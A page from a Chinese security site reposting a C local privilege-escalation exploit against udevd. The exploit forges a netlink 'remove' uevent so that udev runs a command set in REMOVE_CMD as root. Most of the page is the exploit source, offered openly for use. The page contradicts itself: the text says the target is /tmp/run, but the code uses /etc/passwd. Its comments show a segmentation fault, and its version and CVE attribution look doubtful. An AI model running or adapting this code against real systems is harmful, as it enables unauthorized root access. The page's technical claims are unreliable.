首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Linux Kernel 4.8.0 UDEV < 232 - Privilege Escalation 来源：wassline@gmail.com 作者：Asrir 发布时间：2017-04-18   /* # Title: Linux Kernel 4.8.0 udev 232 - Privilege Escalation # Author: Nassim Asrir # Researcher at: Henceforth # Author contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/ # The full Research: https://www.facebook.com/asrirnassim/ # CVE: CVE-2017-7874   # Exp #   first of all we need to know a small infos about udev and how it work   the udev deamon is responsible for receiving device events from the kernel   and this event are delivered to udev via netlink (is a socket family)   you can read more about udev from: https://en.wikipedia.org/wiki/Udev   # Exploit #   The udev vulnerability resulted from a lack of verification of the netlink message source in udevd.   read lines from: /lib/udev/rules.d/50-udev-default.rules   all we need is this action: ACTION=="remove", ENV{REMOVE_CMD}!="", RUN+="$env{REMOVE_CMD}"      this action allows execution of arbitrary commands.   in our exploit we specifying a malicious REMOVE_CMD and causes the privileged execution of attacker-controlled /tmp/run file.   Get your udev version:   Execute: $ udevadm --version   //output: 232   Maybe < 232 also is vulnerable */       // gcc rootme.c -o rootme // ./rootme // segmantation fault   #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <sys/socket.h> #include <linux/types.h> #include <linux/netlink.h>   #ifndef NETLINK_KOBJECT_UEVENT #define NETLINK_KOBJECT_UEVENT 15 #endif   int main(int argc, char **argv) {   int sock;   char *mp;   char message[4096];   struct msghdr msg;   struct iovec iovector;   struct sockaddr_nl address;     memset(&address, 0, sizeof(address));   address.nl_family = AF_NETLINK;   address.nl_pid = atoi(argv[1]);   address.nl_groups = 0;     msg.msg_name = (void*)&address;   msg.msg_namelen = sizeof(address);   msg.msg_iov = &iovector;   msg.msg_iovlen = 1;     sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);   bind(sock, (struct sockaddr *) &address, sizeof(address));     mp = message;   mp += sprintf(mp, "a@/d") + 1;   mp += sprintf(mp, "SUBSYSTEM=block") + 1;   mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;   mp += sprintf(mp, "TIMEOUT=10") + 1;   mp += sprintf(mp, "ACTION=remove") +1;   mp += sprintf(mp, "REMOVE_CMD=/etc/passwd") +1;     iovector.iov_base = (void*)message;   iovector.iov_len = (int)(mp-message);     sendmsg(sock, &msg, 0);     close(sock);     return 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Huawei HG532n Command Injectio ·VirusChaser 8.0 - Buffer Overf ·Alienvault OSSIM/USM 5.3.4/5.3 ·WinSCP 5.9.4 - 'LIST' Denial o ·Microsoft Windows Kernel - 'wi ·Mantis Bug Tracker 1.3.0/2.3.0 ·PonyOS 4.0 - 'fluttershy' LD_L ·Microsoft Windows - Uncredenti ·GNS3 Mac OS-X 1.5.2 - 'ubridge ·Tenable Appliance < 4.5 - Unau ·Cisco Catalyst 2960 IOS 12.2(5 ·pinfo 0.6.9 - Local Buffer Ove   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved